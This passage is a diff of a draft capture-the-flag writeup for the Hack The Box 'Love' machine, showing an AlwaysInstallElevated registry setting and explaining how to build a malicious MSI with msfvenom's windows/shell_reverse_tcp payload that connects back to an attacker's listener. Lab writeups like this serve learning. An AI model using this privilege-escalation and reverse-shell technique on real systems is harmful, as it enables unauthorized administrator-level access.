tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Love-Writeup.md

 HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
     @@@AlwaysInstallElevated@@@    REG_DWORD    @@@0x1@@@

-C:\xampp\htdocs\omrs\images>
 {% endhighlight %}

-We generate our malicious msi file with msfvenom.
+We can generate a malicious MSI file with msfvenom as shown below.
 The `windows/shell_reverse_tcp` is an unstaged reverse shell payload, meaning that we can catch it with a netcat listener.
-Lhost and lport specify the ip and port the reverse shell should connect back to. -f specifies that we want the payload in the format of an msi file.
-We save it to a file named "rs.msi".
+The `Lhost` and `lport` parameters specify an IP address and a port number which the reverse shell payload should connect back to.
+Furthermore, we use the `-f` flag to specify that we want the payload in the format of an MSI file.
+We save the resulting MSI file in a file named "rs.msi".

 {% highlight none linenos %}
 ┌──(kali㉿kali)-[/tmp/x]